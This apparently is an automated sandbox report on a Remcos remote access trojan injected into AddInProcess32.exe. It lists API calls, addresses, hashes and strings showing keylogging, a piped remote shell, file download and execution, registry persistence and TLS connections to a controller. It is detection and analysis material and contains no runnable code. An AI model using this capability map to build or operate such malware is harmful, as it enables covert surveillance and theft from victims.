                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                                                                    • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                                                                  • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                                                                                  • API String ID: 1529173511-2670159127
                                                                                  • Opcode ID: 1e66b8a834fdcbb60039c45ecf35caf02187703de468e50489cd24c9998f40f4
                                                                                  • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                                                                  • Opcode Fuzzy Hash: 1e66b8a834fdcbb60039c45ecf35caf02187703de468e50489cd24c9998f40f4
                                                                                  • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000,00000029,75920F10,00471FFC,00000000), ref: 004139D1
                                                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 00413BE2
                                                                                  • Sleep.KERNELBASE(00000000,00000002), ref: 004144C7
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$ErrorLastLocalTime
                                                                                  • String ID: | $%I64u$3.8.0 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$H"G$TLS Off$TLS On $`"G$hlight$name$!G
                                                                                  • API String ID: 524882891-3814560791
                                                                                  • Opcode ID: d601f5427b71b8bebfdd2cdf66b2cc0c2884c600b77c3aa14ce07a42c2b727ff
                                                                                  • Instruction ID: 5f58eceae2704c6c0e376aa481a0c6a7ef3cc820e2c63ea8d389b44db61c6c97
                                                                                  • Opcode Fuzzy Hash: d601f5427b71b8bebfdd2cdf66b2cc0c2884c600b77c3aa14ce07a42c2b727ff
                                                                                  • Instruction Fuzzy Hash: 9F42AE31A001055BCB18F765DDA6AEEB3699F90308F1041BFF40A721E2EF785F868A5D

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • connect.WS2_32(?,?,?), ref: 004048C0
                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                                                                                  • WSAGetLastError.WS2_32 ref: 00404A01
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                  • API String ID: 994465650-2151626615
                                                                                  • Opcode ID: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
                                                                                  • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                                                                                  • Opcode Fuzzy Hash: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
                                                                                  • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                                                                                  • closesocket.WS2_32(000000FF), ref: 00404E3A
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E71
                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404E82
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E89
                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A
                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9F
                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EA4
                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB1
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                  • String ID:
                                                                                  • API String ID: 3658366068-0
                                                                                  • Opcode ID: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
                                                                                  • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                                                                  • Opcode Fuzzy Hash: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
                                                                                  • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 00409C81
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 00409C8C
                                                                                  • GetForegroundWindow.USER32 ref: 00409C92
                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                                                                    • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                                                  • API String ID: 911427763-3954389425
                                                                                  • Opcode ID: ee9b949ba4685117d773663a634f46785a27bf3fcb47f19481d588488b50e058
                                                                                  • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                                                                                  • Opcode Fuzzy Hash: ee9b949ba4685117d773663a634f46785a27bf3fcb47f19481d588488b50e058
                                                                                  • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040C753
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LongNamePath
                                                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                  • API String ID: 82841172-425784914
                                                                                  • Opcode ID: 785619835b5c11a1d33be1ed114f431dd3e75497d1190346e302d6452478282e
                                                                                  • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                                                                                  • Opcode Fuzzy Hash: 785619835b5c11a1d33be1ed114f431dd3e75497d1190346e302d6452478282e
                                                                                  • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 00409738
                                                                                    • Part of subcall function 0040966D: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                                                    • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                                                    • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                                                    • Part of subcall function 0040966D: CloseHandle.KERNELBASE(00000000,?,?,?,00409745), ref: 004096E6
                                                                                  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 00409774
                                                                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 00409785
                                                                                  • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 0040979C
                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                                                                    • Part of subcall function 0041A20F: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,?,00000000,00000000,00000000,00000000,00000000), ref: 0040991F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                  • String ID: H"G$H"G
                                                                                  • API String ID: 3795512280-1424798214

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,00410C6A), ref: 00419F34
                                                                                    • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                    • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                    • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                                                                  • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentOpenProcessQueryValue
                                                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                  • API String ID: 1866151309-2070987746

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                                                  • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                                                  • CloseHandle.KERNELBASE(00000000,?,?,?,00409745), ref: 004096E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                                  • String ID: h G
                                                                                  • API String ID: 1958988193-3300504347

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,004098DF,?,00000000,00000000), ref: 0041A1D7
                                                                                  • CloseHandle.KERNEL32(00000000,?,004098DF,?,00000000,00000000), ref: 0041A1E3
                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,004098DF,?,00000000,00000000), ref: 0041A1F4
                                                                                  • CloseHandle.KERNELBASE(00000000,?,004098DF,?,00000000,00000000), ref: 0041A201
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                                                  • String ID:
                                                                                  • API String ID: 1852769593-0
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7
                                                                                    • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                                    • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread$LocalTimewsprintf
                                                                                  • String ID: Offline Keylogger Started
                                                                                  • API String ID: 465354869-4114347211
                                                                                  APIs
                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
                                                                                  • RegSetValueExA.KERNELBASE(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
                                                                                  • RegCloseKey.ADVAPI32(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID: pth_unenc
                                                                                  • API String ID: 1818849710-4028850238
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
                                                                                  • RegCloseKey.KERNELBASE(?), ref: 00411F7D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: pth_unenc
                                                                                  • API String ID: 3677997916-4028850238
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041A23C
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041A261
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041A26F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                                  • String ID:
                                                                                  • API String ID: 3919263394-0
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                  • RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3677997916-0
                                                                                  APIs
                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412276
                                                                                  • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004,?,?,?,00410B8A,0046403C,00000000), ref: 00412291
                                                                                  • RegCloseKey.KERNELBASE(?,?,?,?,00410B8A,0046403C,00000000), ref: 0041229C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID:
                                                                                  • API String ID: 1818849710-0
                                                                                  APIs
                                                                                  • OpenProcess.KERNEL32(00100000,00000000,0000081C,00000000,00000000,00410EA3), ref: 00410EB0
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410EBB
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00410EC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandleObjectOpenProcessSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 2544758360-0
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID: P@
                                                                                  • API String ID: 1279760036-676759640
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 004436B8
                                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  • HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00430CB7,00000000,0000000F,0042D6C1,?,?,0042F768,?,?,00000000), ref: 004436F4
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocAllocate_free
                                                                                  • String ID:
                                                                                  • API String ID: 2447670028-0
                                                                                  APIs
                                                                                  • socket.WS2_32(?,00000001,00000006), ref: 00404832
                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052EB,?,?,00000000,00000000,?,?,00000000,004051E8,?,00000000), ref: 0040486E
                                                                                    • Part of subcall function 0040487E: WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                                                                                  Similarity
                                                                                  • API ID: CreateEventStartupsocket
                                                                                  • String ID:
                                                                                  • API String ID: 1953588214-0
                                                                                  APIs
                                                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,0046FACC,00471FFC,00000000,00413BDE,00000000,00000001), ref: 00413961
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 00413966
                                                                                    • Part of subcall function 004137DC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                                                                    • Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 0041386D
                                                                                    • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                                                                    • Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 00413894
                                                                                    • Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 004138CC
                                                                                    • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                                                                    • Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                                                                    • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                                                                  Similarity
                                                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                  • String ID:
                                                                                  • API String ID: 1170566393-0
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00408F39
                                                                                    • Part of subcall function 00409203: CreateThread.KERNELBASE(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
                                                                                    • Part of subcall function 00409203: CreateThread.KERNELBASE(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
                                                                                    • Part of subcall function 00409203: CreateThread.KERNELBASE(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7
                                                                                  Similarity
                                                                                  • API ID: CreateThread$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 1119755333-0
                                                                                  APIs
                                                                                    • Part of subcall function 00443005: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000), ref: 00443046
                                                                                  • _free.LIBCMT ref: 0044D320
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 614378929-0
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000), ref: 00443046
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  APIs
                                                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                                                                                  Similarity
                                                                                  • API ID: Startup
                                                                                  • String ID:
                                                                                  • API String ID: 724789610-0
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: send
                                                                                  • String ID:
                                                                                  • API String ID: 2809346765-0
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,?), ref: 00406D4A
                                                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                                                                                    • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
                                                                                    • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
                                                                                    • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
                                                                                    • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
                                                                                    • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                    • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
                                                                                    • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040768E
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                                                                  • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                  • API String ID: 1385304114-1507758755
                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 004056C6
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  • __Init_thread_footer.LIBCMT ref: 00405703
                                                                                  • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                                                                  • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                                                                    • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                                                                  • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                                                                  • CloseHandle.KERNEL32 ref: 00405A03
                                                                                  • CloseHandle.KERNEL32 ref: 00405A0B
                                                                                  • CloseHandle.KERNEL32 ref: 00405A1D
                                                                                  • CloseHandle.KERNEL32 ref: 00405A25
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
